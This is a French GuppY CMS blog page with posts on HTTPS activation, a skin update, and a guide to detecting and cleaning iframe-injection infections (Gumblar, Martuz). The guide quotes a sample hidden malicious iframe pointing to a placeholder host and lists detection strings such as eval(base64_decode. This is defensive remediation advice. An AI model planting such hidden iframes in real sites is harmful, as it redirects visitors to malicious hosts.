Texte à méditer :   La meilleure éducation est celle qui est complétée par l'intervention d'une famille bien constituée, en donnant à l'enfant des exemples.   Édouard Herriot
Vous êtes ici :   Accueil » Blog - Billets des amis
 
Prévisualiser...  Imprimer...  Imprimer la page...
Blog - Billets des amis

GuppY CMS Portail WEB php gratuit sans BDD


GuppY: the easy and free web portal that requires no database to run


Activation du protocole HTTPS - par Guppy_Team le 10/11/2016 @ 21:19"

Bonjour à toutes et à tous,
 

L'une des nouveautés de la prochaine version de GuppY sera la prise en compte du protocole sécurisé HTTPS.

Vous avez sans doute lu dans la presse spécialisée que dans un futur proche les sites non sécurisés ne seront plus référencés, ou moins bien référencés, dixit Google par exemple.

Nous ne cédons pas à une mode, mais nous le proposons pour une plus grande sécurisation de vos données, pour la protection de votre vie privée.

Vos connexions sur votre site, celle de vos visiteurs seront entièrement cryptées et sécurisées.

Dans votre navigateur, vous pouvez voir la liste des systèmes utilisés en plaçant votre curseur sur le petit cadenas vert quand vous êtes sur une page en HTTPS.

Ce protocole peut déjà être activé en mutualisé chez certains hébergeurs comme notre partenaire Nuxit bien sûr, également chez OVH et 1&1 chez lesquels nous disposons d'un nom de domaine pour nos tests.

Passer en HTTPS induit quelques contraintes, la première ce sont les liens externes, images, vidéos et documents encapsulés dans un iframe qui ne sont plus admis, seules les iframes du site peuvent être affichées.

Attention, la totalité de votre site doit être sécurisé, il ne peut pas y avoir de contenu mixte.

Le cadenas vert vous indique que les communications entre votre navigateur et le site web sont sûres. Personne ne peut les espionner, et personne ne peut trafiquer les communications. Mais il ne garantie rien d'autre !

Soyez vigilants, et ne confiez pas n'importe quelle information sur n'importe quel site, cadenas ou pas.

Selon les modalités prévues par votre hébergeur, il ne vous restera à faire, dans le .htaccess de la racine, qu'une redirection HTTP => HTTPS permettant de renvoyer tous vos visiteurs vers la version sécurisée.

Sur tous les sites officiels GuppY, le protocole sécurisé HTTPS est activé.

Malgré nos recherches, si vous voyez le cadenas vert avec un avertissement pour du contenu mixte, merci de nous signaler la page.

La GuppY Team

... / ... Lire la suite

(10/11/2016 21:19)
Mise à jour skins et personnalisation - par Guppy_Team le 30/04/2016 @ 17:20"

Information importante pour la mise à jour des skins et leur personnalisation
 


Bonjour à tous,

La prochaine version 5.01.03 de GuppY doit être disponible en téléchargement début Juin, elle doit apporter son lot de nouveautés, modifications et corrections.

Parmi celles-ci, une modification importante est la suppression dans tous les fichiers de tous les styles d’affichage pour les regrouper dans les fichiers css de GuppY comme le recommandent toutes les normes.
Notre ami Saxbar y travaille depuis plusieurs mois et nous voyons poindre la fin des corrections, les  premiers tests sont très encourageants et nous invitent à poursuivre dans cette voie.

A vrai dire nous n’avons pas trop le choix, si nous voulons poursuivre le développement de GuppY 5 et être résolument sur la voie d’un CMS moderne, toujours à la pointe des nouvelles technologies du web. Après la sortie de GuppY 5.01.00 à la mi-juin 2015, c’est une nouvelle étape importante.

Nous sommes conscients des changements que cela suppose pour les skins de GuppY, pour les utilisateurs de GuppY :

- l’utilisation de skins compatibles avec config look est indispensable avec des avantages certains, un clic sur Générer Style et un ou plusieurs rafraîchissements de la page et votre skin sera à jour pour la version 5.01.03 . Vous n’aurez rien d’autre à faire !

- la personnalisation de l’habillage de votre site doit se faire dans le fichier styleplus.css exclusivement. Si vous avez fait des modifications directement dans le fichier style.css, vous avez un peu plus d’un mois pour les reporter dans le fichier styleplus.css. Si vous ne le faites pas, vous ne pourrez pas mettre à jour votre skin et la modification manuelle du fichier style.css ne sera plus possible.

- pour l’avenir, à chaque patch, vous pourrez mettre à jour votre skin d’un seul clic sur Générer Style.

A ce jour, près d’une centaine de skins sont compatibles Config look, le tutoriel d’utilisation de config look sera mis à jour sur le Centre d’Aide GuppY avant la sortie de la 5.01.03, et bien sûr toute l'équipe sera présente pour vous aider.

Nous vous remercions pour votre fidélité à GuppY, pour votre soutien qui est important pour nous.

Cordialement

La GuppY Team

... / ... Lire la suite

(30/04/2016 17:20)
Que faire suite à une attaque Iframe via Gumblar, Martuz, Troj / JSRedir-R, ... ? ! - par GuppYTeam le 02/11/2012 @ 23:48"

Suite à des demandes récurrentes sur le forum et bien que GuppY n'ait rien à voir avec des problèmes de sécurité liés à ce ver / cheval de Troie qui est connu sous différentes appellations et qui peut attaquer n'importe quel site quelle que soit sa programmation, nous vous donnons ci-dessous quelques informations pour lutter contre :
  • Gumblar, Martuz, Troj / JSRedir-R et consorts se propagent sur le Net via des sites web infectés en profitant de failles de logiciels qui ne sont pas à jour sur les PC des administrateurs, webmasters, modérateurs ou rédacteurs de sites qui ont accès aux FTP de leurs sites.
  • Des failles ont été notamment repérées sur les logiciels Adobe (Adobe Acrobat Reader, Adobe Flash Player, ...) non mis à jour mais il n'est pas exclu que d'autres logiciels non mis à jour puissent avoir des failles potentielles.
  • Si le cheval de Troie a réussi à s'installer sur le PC d'un des administrateurs, webmasters, modérateurs ou rédacteurs d'un site faute d'avoir un antivirus efficace et à jour, celui-ci récupère les codes d'accès FTP du site concerné et ensuite tout est évidemment possible.
  • Le site sera à son tour pollué par les pirates et va en polluer d'autres.
Comment s'aperçoit-on que son site est infecté :
  • Si votre antivirus ou votre anti-spyware vous indique une attaque iframe.
  • Si Google ou un autre moteur de recherche indique que votre site est dangereux.
  • Si votre hébergeur bloque le site pour cette raison.
  • Si votre navigateur vous redirige vers un site douteux ou qu'il vous demande si vous acceptez cette redirection.
  • Si vous vous apercevez que de nouveaux fichiers et/ou répertoires ont été installés à votre insu sur votre FTP ou que le poids de certains fichiers a changé.
  • ...
Que se passe-il sur le site infecté ?
  • Des fichiers sont altérés par des commandes d'iframe du genre :
"<.iframe src="http://site_pollueur.cn:8080/index.php" width=100 height=150 style="visibility: hidden">.>"
Car souvent les iframes sont invisibles sur le site (visibility: hidden)
  • Dans certains cas, les pirates installent des scripts plus ou moins puissants capables de lancer des attaques depuis votre site vers d'autres sites ou même vers votre serveur.
  • Dans d'autres cas une partie du code est codé en Base64 ce qui donne des chaînes du genre :
Qm9uam91cg== qui est égal à Bonjour confused
aWZyYW1l qui est égal à iframe confused
  • Les fichiers les plus couramment infectés sont les fichiers index avec n'importe quelle extension (html, htm, php,...), mais n'importe quel fichier et même des images ou faux fichiers d'images peuvent l'être !
     
Que faire en cas d'infection ?
  • Il faut d'abord scanner son PC avec un antivirus efficace et à jour ou un antispyware. A noter que le premier antivirus ou l'un des premiers à détecter et bloquer ces attaques est  Avast même dans sa version gratuite. Celui-ci a d'ailleurs été victime de railleries à cette époque en disant qu'il générait des "faux positifs".
  • Mettre à jour Windows ou son OS quel qu'il soit si ce n'est pas fait.
  • Mettre à jour ses logiciels (En particulier les logiciels Adobe).
  • Demander à tous les éventuels administrateurs, modérateurs ou rédacteurs de vos sites de faire de même.

En ce qui concerne la désinfection du site (ou des sites) lui-même si l'on est sous un PC Windows avec un hébergement mutualisé
:
  • Rapatrier le site en local via le FTP et le passer à l'antivirus
  • Rechercher les fichiers qui semblent être en plus lourds ou qui semblent avoir un poids différent.
  • Rechercher dans tous les fichiers des chaînes de caractères suspectes telles que iframe, hidden, ... Notepad++, entre autres, peut faire cela ainsi que comparer des fichiers de même nom (un fichier d'origine d'un pack GuppY neuf et un fichier de la sauvegarde du site pollué).
  • Remplacer ou réparer les fichiers infectés et supprimer les fichiers surnuméraires.
  • Passer à nouveau l'antivirus.
  • Changer les codes FTP (au moins le mot de passe) si possible depuis un autre PC qui n'a pas été infecté.
  • Envoyer à nouveau les fichiers et dossiers du site désinfecté sur le serveur.
  • Tester le site en ligne après avoir vidé le cache du ou des navigateurs. 

Si vous avez accès au serveur Linux / Unix via une console SSH (Cas d'un serveur dédié, semi-dédié, serveur privé virtuel (VPS) ) ou si votre site est hébergé chez vous sous Linux ou Unix
:
  • Vous pouvez faire une recherche sur tout ou partie du serveur ou des sites installés sur celui-ci à l'aide des commandes grep et find sur les mots clefs indiqués plus haut ou d'autres comme eval(base64_decode( , mais dans ce cas les habitués de Linux / Unix savent faire.
 
Précautions à prendre :
  • Mettre à jour ses logiciels et demander aux autres administrateurs du site de faire de même.
  • Mettre à jour les antivirus et antispywares et demander aux autres administrateurs du site de faire de même.
  • Eviter d'enregistrer ses mots de passe FTP en particulier et les taper à chaque fois.
  • Chmoder le plus de fichiers possibles en 444 (lecture seule) et en particulier les fichiers index et même les .htaccess.

Il ne faut évidemment pas chmoder de cette façon les fichiers qui doivent être en lecture / écriture tel que les fichiers de données et d'autres qui ne pourraient plus être édités ou incrémentés.
 
Un autre inconvénient du chmodage en lecture seule c'est qu'il faudra les remettre en lecture écriture (644 - 666) avant de placer un patch ou de faire une migration mais c'est le prix à payer pour avoir une certaine sécurité supplémentaire.
 
  • Il existe également des softs qui sont capables d'éradiquer ces troyens mais ils sont en général payants.
Ces explications glanées ici et là ainsi que le fruit de nos expériences personnelles ne sont en aucun cas exhaustives d'autant plus que ces malwares évoluent sans cesse.
 
Pour plus d'information il faut taper dans Google ou votre moteur de recherche favori l'un des mots clefs ci-dessous ou plusieurs d'entre eux :
Iframe Gumblar Martuz Troj / JSRedir-R

Bon courage en cas d'infection.
JeandePeyrat pour GuppY Team.

... / ... Lire la suite

(02/11/2012 23:48)
Mise en service création automatique de fils twitter - Blog freeguppy.org - par JeandePeyrat le 08/01/2011 @ 16:54"

Mise en service de la création automatique de fils twitter à partir du bloggy de http://www.freeguppy.org
(08/01/2011 16:54)

Dernière mise à jour : 21/12/2024 03:22

Rubriques
Derniers billets
Derniers commentaires
Archives
11-2024 Décembre 2024 01-2025
L M M J V S D
            01
02 03 04 05 06 07 08
09 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31          
Billets des amis